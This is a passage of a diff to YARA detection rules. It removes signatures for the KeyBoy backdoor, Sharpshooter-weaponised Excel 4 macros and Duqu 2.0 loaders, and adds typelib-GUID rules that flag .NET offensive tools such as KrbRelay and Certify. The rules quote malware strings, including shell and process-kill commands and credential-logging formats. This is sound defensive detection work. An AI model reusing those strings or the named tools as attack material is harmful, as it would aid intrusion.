+		$typelibguid1up = "11DC83C6-8186-4887-B228-9DC4FD281A23" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3000KB and ( 1 of ( $x* ) or 2 of them )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Keyboy_Wab32Res : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Driver_Template : FILE
 {
 	meta:
-		description = "Detects KeyBoy Loader wab32res.dll"
-		author = "Markus Neis, Florian Roth"
-		id = "0e4045a7-1c45-5043-9e10-e969219b67f8"
-		date = "2018-03-26"
-		modified = "2023-12-05"
-		reference = "https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_keyboys.yar#L75-L96"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "539f88c5-e779-55e0-98df-299a9068de9b"
+		date = "2021-01-21"
+		modified = "2023-04-06"
+		reference = "https://github.com/FuzzySecurity/Driver-Template"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4931-L4945"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "5e23bfeed0587ac69527234dd3f8b4f8c5628128ab667af7b99c4d75ca99459b"
+		logic_hash = "533cefcc86ff8eff8757041df8acf2a9c484d265b6aa9516c12adb606d6f71cb"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "02281e26e89b61d84e2df66a0eeb729c5babd94607b1422505cd388843dd5456"
-		hash2 = "fb9c9cbf6925de8c7b6ce8e7a8d5290e628be0b82a58f3e968426c0f734f38f6"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "B4490-2314-55C1- /Processid:{321bitsadmin /canceft\\windows\\curresoftware\\microso" fullword ascii
-		$x2 = "D:\\Work\\VS\\House\\TSSL\\TSSL\\TClient" ascii
-		$x3 = "\\Release\\FakeRun.pdb" ascii
-		$x4 = "FakeRun.dll" fullword ascii
-		$s1 = "cmd.exe /c \"%s\"" fullword ascii
-		$s2 = "CreateProcess failed (%d)" fullword ascii
-		$s3 = "CreateProcess %s " fullword ascii
-		$s4 = "FindResource %s error " fullword ascii
+		$typelibguid0lo = "bdb79ad6-639f-4dc2-8b8a-cd9107da3d69" ascii wide
+		$typelibguid0up = "BDB79AD6-639F-4DC2-8B8A-CD9107DA3D69" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( 1 of ( $x* ) or 4 of them )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-
-rule SIGNATURE_BASE_Keyboy_Rasauto : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Nashavm : FILE
 {
 	meta:
-		description = "Detects KeyBoy ServiceClient"
-		author = "Markus Neis, Florian Roth"
-		id = "b6c72a91-fda1-5f40-804f-896b25a8813f"
-		date = "2018-03-26"
-		modified = "2023-12-05"
-		reference = "https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_keyboys.yar#L98-L126"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "3abbf636-01f4-547a-98c0-d7bfec07e31a"
+		date = "2021-01-21"
+		modified = "2023-04-06"
+		reference = "https://github.com/Mrakovic-ORG/NashaVM"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4947-L4961"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "87529000522d5fad4346a0228c96d3adf122587d91b0cff083948787e53cc024"
+		logic_hash = "4046e8183ee2bcf95893f9a438f13aec9afa99e252029888830a0bf81dac2f6f"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "49df4fec76a0ffaee5e4d933a734126c1a7b32d1c9cb5ab22a868e8bfc653245"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "rundll32.exe %s SSSS & exit" fullword ascii
-		$x2 = "D:\\Work\\Project\\VS\\HSSL\\HSSL_Unicode _2\\Release\\ServiceClient.pdb" fullword ascii
-		$s1 = "cmd.exe /c \"%s\"" fullword ascii
-		$s2 = "CreateProcess failed (%d)" fullword ascii
-		$s3 = "ServiceClient.dll" fullword ascii
-		$s4 = "NtWow64QueryInformationProcess64 failed" fullword ascii
-		$s5 = "pid:%d CmdLine:%S" fullword ascii
-		$s6 = "rasauto32.ServiceMain" fullword ascii
-		$s7 = "del /q/f %s\\%s*" fullword ascii
-		$s8 = "szTmpDll:%s" fullword ascii
-		$s9 = "lpCmdLine:%s" fullword ascii
-		$s0 = "ReleaseFileFromRes:%s ok!" fullword ascii
+		$typelibguid0lo = "f9e63498-6e92-4afd-8c13-4f63a3d964c3" ascii wide
+		$typelibguid0up = "F9E63498-6E92-4AFD-8C13-4F63A3D964C3" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( pe.exports ( "SSSS" ) or 1 of ( $x* ) or 4 of them )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Keyboy_876_0X4E20000 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpsqlpwn : FILE
 {
 	meta:
-		description = "Detects KeyBoy Backdoor"
-		author = "Markus Neis, Florian Roth"
-		id = "0b871f62-0f7c-5c94-9b3d-f68832ab64b4"
-		date = "2018-03-26"
-		modified = "2023-12-05"
-		reference = "https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_keyboys.yar#L128-L155"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "b533d61a-8693-5c3c-8b31-2117262cad4e"
+		date = "2022-11-21"
+		modified = "2023-04-06"
+		reference = "https://github.com/lefayjey/SharpSQLPwn.git"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4963-L4977"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "092bb19cd7a4250560ea71a3e54780a8fd34a229caa294e4cd5b6d522850d519"
+		logic_hash = "2015c80084199bfedebe1591f02ffad5f31218351148d8087789b82523a39baa"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "6e900e5b6dc4f21a004c5b5908c81f055db0d7026b3c5e105708586f85d3e334"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "%s\\rundll32.exe %s ServiceTake %s %s" fullword ascii
-		$x2 = "#%sCmd shell is not running,or your cmd is error!" fullword ascii
-		$x3 = "Take Screen Error,May no user login!" fullword ascii
-		$x4 = "Get logon user fail!" fullword ascii
-		$x5 = "8. LoginPasswd:%s" fullword ascii
-		$x6 = "Take Screen Error,service dll not exists" fullword ascii
-		$s1 = "taskkill /f /pid %s" fullword ascii
-		$s2 = "TClient.exe" fullword ascii
-		$s3 = "%s\\wab32res.dll" fullword ascii
-		$s4 = "%s\\rasauto.dll" fullword ascii
-		$s5 = "Download file:%s index:%d" fullword ascii
-		$s6 = "LogonUser: [%s]" fullword ascii
+		$typelibguid0lo = "c442ea6a-9aa1-4d9c-9c9d-7560a327089c" ascii wide
+		$typelibguid0up = "C442EA6A-9AA1-4D9C-9C9D-7560A327089C" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2000KB and ( 1 of ( $x* ) or 3 of them )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_MAL_Sharpshooter_Excel4 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Group3R : FILE
 {
 	meta:
-		description = "Detects Excel documents weaponized with Sharpshooter"
-		author = "John Lambert, Florian Roth"
-		id = "a79e3afe-e8f9-5e56-a131-bb1b346df471"
-		date = "2020-03-27"
-		modified = "2023-12-05"
-		reference = "https://docs.microsoft.com/en-us/openspecs/office_file_formats/ms-xls/00b5dd7d-51ca-4938-b7b7-483fe0e5933b"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_Excel4Macro_Sharpshooter.yar#L1-L25"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "0571d71e-50ca-5c1b-b750-34acc2d06687"
+		date = "2022-11-21"
+		modified = "2023-04-06"
+		reference = "https://github.com/Group3r/Group3r.git"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4979-L4995"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "ccef64586d25ffcb2b28affc1f64319b936175c4911e7841a0e28ee6d6d4a02d"
-		logic_hash = "4aec8bb7ec8ce7ebd8228416133ea7eec995864aeec78c11548387d832b5fa65"
-		score = 70
+		logic_hash = "8ff62920395c8db7544ba0fb0dc0833892f89d0f8908bc3eee909ad1e012c84c"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$header_docf = { D0 CF 11 E0 }
-		$s1 = "Excel 4.0 Macros"
-		$f1 = "CreateThread" ascii fullword
-		$f2 = "WriteProcessMemory" ascii fullword
-		$f3 = "Kernel32" ascii fullword
-		$concat = { 00 41 6f 00 08 1e ?? 00 41 6f 00 08 1e ?? 00 41 6f 00 08}
+		$typelibguid0lo = "868a6c76-c903-4a94-96fd-a2c6ba75691c" ascii wide
+		$typelibguid0up = "868A6C76-C903-4A94-96FD-A2C6BA75691C" ascii wide
+		$typelibguid1lo = "caa7ab97-f83b-432c-8f9c-c5f1530f59f7" ascii wide
+		$typelibguid1up = "CAA7AB97-F83B-432C-8F9C-C5F1530F59F7" ascii wide
 
 	condition:
-		filesize < 1000KB and $header_docf at 0 and #concat > 10 and $s1 and 2 of ( $f* )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_SUSP_Excel4Macro_Autoopen : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Tokenstomp : FILE
 {
 	meta:
-		description = "Detects Excel4 macro use with auto open / close"
-		author = "John Lambert @JohnLaTwC"
-		id = "cfed97fe-b330-5528-8402-08c6ba6af04a"
-		date = "2020-03-26"
-		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_Excel4Macro_Sharpshooter.yar#L27-L69"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "e4266969-ab03-50dc-b5b1-f4bb1c9846f4"
+		date = "2022-11-21"
+		modified = "2023-04-06"
+		reference = "https://github.com/MartinIngesen/TokenStomp"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4997-L5011"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f"
-		logic_hash = "074aab8e1d3b66e34e8e8d8e8489e1dfee1091df0424b22cd1bfd3cf904754e1"
-		score = 50
+		logic_hash = "7bc49a8c654a6c6e3f0aa0378e91007c8ebdac90b536fbbfc123b09ff41eaa73"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$header_docf = { D0 CF 11 E0 }
-		$s1 = "Excel" fullword
-		$Auto_Open = {18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3a }
-		$Auto_Close = {18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 02 3a }
-		$Auto_Open1 = {18 00 17 00 aa 03 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3a }
-		$Auto_Close1 = {18 00 17 00 aa 03 00 01 07 00 00 00 00 00 00 00 00 00 00 02 3a }
+		$typelibguid0lo = "8aac271f-9b0b-4dc3-8aa6-812bb7a57e7b" ascii wide
+		$typelibguid0up = "8AAC271F-9B0B-4DC3-8AA6-812BB7A57E7B" ascii wide
 
 	condition:
-		filesize < 3000KB and $header_docf at 0 and $s1 and any of ( $Auto_* )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_APT_Apt_Duqu2_Loaders : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Krbrelay : FILE
 {
 	meta:
-		description = "Rule to detect Duqu 2.0 samples"
-		author = "Kaspersky Lab"
-		id = "22db52c2-18e7-537e-a9c5-38ccfd3a0d30"
-		date = "2015-06-09"
-		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_kaspersky_duqu2.yar#L10-L38"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "3f59986c-8bd8-5e70-b3eb-038247d1ccd7"
+		date = "2022-11-21"
+		modified = "2023-04-06"
+		reference = "https://github.com/cube0x0/KrbRelay"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L5013-L5029"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "79f205745e61b55c43c239d9da9086fd72312ea2741351183d32f7c227174ff8"
+		logic_hash = "1cab7949f922e286ed68826cc8f0028cabdc10bd328398b6d2517ad467be50b8"
 		score = 75
-		quality = 83
+		quality = 85
 		tags = "FILE"
-		version = "1.0"
-
-	strings:
-		$a1 = "{AAFFC4F0-E04B-4C7C-B40A-B45DE971E81E}" wide
-		$a2 = "\\\\.\\pipe\\{AAFFC4F0-E04B-4C7C-B40A-B45DE971E81E}" wide
-		$a4 = "\\\\.\\pipe\\{AB6172ED-8105-4996-9D2A-597B5F827501}" wide
-		$a5 = "Global\\{B54E3268-DE1E-4c1e-A667-2596751403AD}" wide
-		$a8 = "SELECT `Data` FROM `Binary` WHERE `Name`='%s%i'" wide
-		$a9 = "SELECT `Data` FROM `Binary` WHERE `Name`='CryptHash%i'" wide
-		$a7 = "SELECT `%s` FROM `%s` WHERE `%s`='CAData%i'" wide
-		$b1 = "MSI.dll"
-		$b2 = "msi.dll"
-		$b3 = "StartAction"
-		$c1 = "msisvc_32@" wide
-		$c2 = "PROP=" wide
-		$c3 = "-Embedding" wide
-		$c4 = "S:(ML;;NW;;;LW)" wide
-		$d1 = "NameTypeBinaryDataCustomActionActionSourceTargetInstallExecuteSequenceConditionSequencePropertyValueMicrosoftManufacturer" nocase
-		$d2 = {2E 3F 41 56 3F 24 5F 42 69 6E 64 40 24 30 30 58 55 3F 24 5F 50 6D 66 5F 77 72 61 70 40 50 38 43 4C 52 ?? 40 40 41 45 58 58 5A 58 56 31 40 24 24 24 56 40 73 74 64 40 40 51 41 56 43 4C 52 ?? 40 40 40 73 74 64 40 40}
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+
+	strings:
+		$typelibguid0lo = "ed839154-90d8-49db-8cdd-972d1a6b2cfd" ascii wide
+		$typelibguid0up = "ED839154-90D8-49DB-8CDD-972D1A6B2CFD" ascii wide
+		$typelibguid1lo = "3b47eebc-0d33-4e0b-bab5-782d2d3680af" ascii wide
+		$typelibguid1up = "3B47EEBC-0D33-4E0B-BAB5-782D2D3680AF" ascii wide
 
 	condition:
-		(( uint16( 0 ) == 0x5a4d ) and ( ( any of ( $a* ) ) or ( all of ( $b* ) ) or ( all of ( $c* ) ) ) and filesize < 100000 ) or ( ( uint32( 0 ) == 0xe011cfd0 ) and ( ( any of ( $a* ) ) or ( all of ( $b* ) ) or ( all of ( $c* ) ) or ( any of ( $d* ) ) ) and filesize < 20000000 )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_APT_Apt_Duqu2_Drivers : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sqlrecon : FILE
 {
 	meta:
-		description = "Rule to detect Duqu 2.0 drivers"
-		author = "Kaspersky Lab"
-		id = "714d5151-9f80-582e-a628-1de9d83a072d"
-		date = "2015-06-09"
-		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_kaspersky_duqu2.yar#L40-L57"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "f9ea5283-0a5c-5bde-966c-80869ee25888"
+		date = "2023-01-20"
+		modified = "2023-04-06"
+		reference = "https://github.com/skahwah/SQLRecon"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L5031-L5045"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "023a51408f86814a8f810d0f89b185aca07dd60a1abb6de47f86ad8eeda4c4c4"
+		logic_hash = "fed5ef9d4702c463fd2f138f5e4cc0a1841fc329a2923afeca83f193bb6213ea"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		version = "1.0"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$a1 = "\\DosDevices\\port_optimizer" wide nocase
-		$a2 = "romanian.antihacker"
-		$a3 = "PortOptimizerTermSrv" wide
-		$a4 = "ugly.gorilla1"
-		$b1 = "NdisIMCopySendCompletePerPacketInfo"
-		$b2 = "NdisReEnumerateProtocolBindings"
-		$b3 = "NdisOpenProtocolConfiguration"
+		$typelibguid0lo = "612c7c82-d501-417a-b8db-73204fdfda06" ascii wide
+		$typelibguid0up = "612C7C82-D501-417A-B8DB-73204FDFDA06" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( any of ( $a* ) ) and ( 2 of ( $b* ) ) and filesize < 100000
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Duqu2_Generic1 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Certify : FILE
 {
 	meta:
-		description = "Kaspersky APT Report - Duqu2 Sample - Generic Rule"
-		author = "Florian Roth (Nextron Systems)"
-		id = "0e03eda5-d65b-5400-aceb-bc37559d9a6e"
-		date = "2015-06-10"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/7yKyOj"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_kaspersky_duqu2.yar#L61-L90"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "69f120fe-bd4d-59ba-b1b9-528ab300e450"
+		date = "2023-03-06"
+		modified = "2023-04-06"
+		reference = "https://github.com/GhostPack/Certify"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L5047-L5062"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "742934198391bd30da654bf8efedc2a18c58dd0de357b2bcdbdbe8066187b0c2"
+		hash = "da585a8d4985082873cb86204d546d3f53668e034c61e42d247b11e92b5e8fc3"
+		logic_hash = "bd856a146f441f28d8190d29b3168794cf2b68292869858c763200ae529615da"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "3f9168facb13429105a749d35569d1e91465d313"
-		hash1 = "0a574234615fb2382d85cd6d1a250d6c437afecc"
-		hash2 = "38447ed1d5e3454fe17699f86c0039f30cc64cde"
-		hash3 = "5282d073ee1b3f6ce32222ccc2f6066e2ca9c172"
-		hash4 = "edfca3f0196788f7fde22bd92a8817a957c10c52"
-		hash5 = "6a4ffa6ca4d6fde8a30b6c8739785f4bd2b5c415"
-		hash6 = "00170bf9983e70e8dd4f7afe3a92ce1d12664467"
-		hash7 = "32f8689fd18c723339414618817edec6239b18f3"
-		hash8 = "f860acec9920bc009a1ad5991f3d5871c2613672"
-		hash9 = "413ba509e41c526373f991d1244bc7c7637d3e13"
-		hash10 = "29cd99a9b6d11a09615b3f9ef63f1f3cffe7ead8"
-		hash11 = "dfe1cb775719b529138e054e7246717304db00b1"
 
 	strings:
-		$s0 = "Global\\{B54E3268-DE1E-4c1e-A667-2596751403AD}" fullword wide
-		$s1 = "SetSecurityDescriptorSacl" fullword ascii
-		$s2 = "msisvc_32@" fullword wide
-		$s3 = "CompareStringA" fullword ascii
-		$s4 = "GetCommandLineW" fullword ascii
+		$typelibguid0lo = "64524ca5-e4d0-41b3-acc3-3bdbefd40c97" ascii wide
+		$typelibguid0up = "64524CA5-E4D0-41B3-ACC3-3BDBEFD40C97" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 150KB and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_APT_Kaspersky_Duqu2_Procexp : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Aladdin : FILE
 {
 	meta:
-		description = "Kaspersky APT Report - Duqu2 Sample - Malicious MSI"
-		author = "Florian Roth (Nextron Systems)"
-		id = "d7fd48d5-2416-5eff-a751-ece09ce27767"
-		date = "2015-06-10"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/7yKyOj"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_kaspersky_duqu2.yar#L92-L114"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "3f0a954c-f3b3-5e5d-a71d-11f60b026a48"
+		date = "2023-03-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/nettitude/Aladdin"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L5064-L5082"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "dd63f0eebc88fa0737905f20dc30dc968df81b7976a86ed8ed5646f7708c4b4a"
+		logic_hash = "ed23700de0e8d6527f64714b8c2e3a43c4a0798d710b67d6602b5d4ae276cbbd"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "2422835716066b6bcecb045ddd4f1fbc9486667a"
-		hash2 = "b120620b5d82b05fee2c2153ceaf305807fa9f79"
-		hash3 = "288ebfe21a71f83b5575dfcc92242579fb13910d"
 
 	strings:
-		$x1 = "svcmsi_32.dll" fullword wide
-		$x2 = "msi3_32.dll" fullword wide
-		$x3 = "msi4_32.dll" fullword wide
-		$x4 = "MSI.dll" fullword ascii
-		$s1 = "SELECT `Data` FROM `Binary` WHERE `Name`='%s%i'" fullword wide
-		$s2 = "Sysinternals installer" fullword wide
-		$s3 = "Process Explorer" fullword wide
+		$typelibguid0lo = "b2b3adb0-1669-4b94-86cb-6dd682ddbea3" ascii wide
+		$typelibguid0up = "B2B3ADB0-1669-4B94-86CB-6DD682DDBEA3" ascii wide
+		$typelibguid1lo = "c47e4d64-cc7f-490e-8f09-055e009f33ba" ascii wide
+		$typelibguid1up = "C47E4D64-CC7F-490E-8F09-055E009F33BA" ascii wide
+		$typelibguid2lo = "32a91b0f-30cd-4c75-be79-ccbd6345de99" ascii wide
+		$typelibguid2up = "32A91B0F-30CD-4C75-BE79-CCBD6345DE99" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and ( 1 of ( $x* ) ) and ( all of ( $s* ) )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_APT_Kaspersky_Duqu2_Samsungprint : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpldaprelayscan : FILE
 {
 	meta:
-		description = "Kaspersky APT Report - Duqu2 Sample"
-		author = "Florian Roth (Nextron Systems)"
-		id = "cc4bc00e-f38b-577f-8f00-637c0549894c"
-		date = "2015-06-10"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/7yKyOj"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_kaspersky_duqu2.yar#L116-L134"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "554a5487-ac53-512f-8f6f-ad8186144715"
+		date = "2023-03-15"
+		modified = "2023-04-06"
+		reference = "https://github.com/klezVirus/SharpLdapRelayScan"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L5084-L5098"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "ce39f41eb4506805efca7993d3b0b506ab6776ca"
-		logic_hash = "9b2d80cfe3c47ac315b76c773acc3290668e06e4bbd99402e203b72af593fab8"
+		logic_hash = "853b8b7e797a4be85f5218ad2f54dd4a91812e9e53ad061ca3e849326a8f9189"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "Installer for printer drivers and applications" fullword wide
-		$s1 = "msi4_32.dll" fullword wide
-		$s2 = "HASHVAL" fullword wide
-		$s3 = "SELECT `%s` FROM `%s` WHERE `%s`='CAData%i'" fullword wide
-		$s4 = "ca.dll" fullword ascii
-		$s5 = "Samsung Electronics Co., Ltd." fullword wide
+		$typelibguid0lo = "a93ee706-a71c-4cc1-bf37-f26c27825b68" ascii wide
+		$typelibguid0up = "A93EE706-A71C-4CC1-BF37-F26C27825B68" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 82KB and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_APT_Kaspersky_Duqu2_Msi3_32 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Ldapsigncheck : FILE
 {
 	meta:
-		description = "Kaspersky APT Report - Duqu2 Sample"
-		author = "Florian Roth (Nextron Systems)"
-		id = "6cbea2e7-f406-57cf-b9c8-9d84b1480035"
-		date = "2015-06-10"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/7yKyOj"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_kaspersky_duqu2.yar#L136-L157"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "a8b902f0-61a5-509e-8307-79bf557e5f61"
+		date = "2023-03-15"
+		modified = "2023-04-06"
+		reference = "https://github.com/cube0x0/LdapSignCheck"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L5100-L5114"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "53d9ef9e0267f10cc10f78331a9e491b3211046b"
-		logic_hash = "718223d1ff82ffa0f3204e0cdaf0d441ed133f1f069d9ba2eb818bd3445f63ca"
+		logic_hash = "c075fabcd39cecc2c5b5d706a1ac305bb75522b9d7f8c8cba11ca2d80da814a0"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "ProcessUserAccounts" fullword ascii
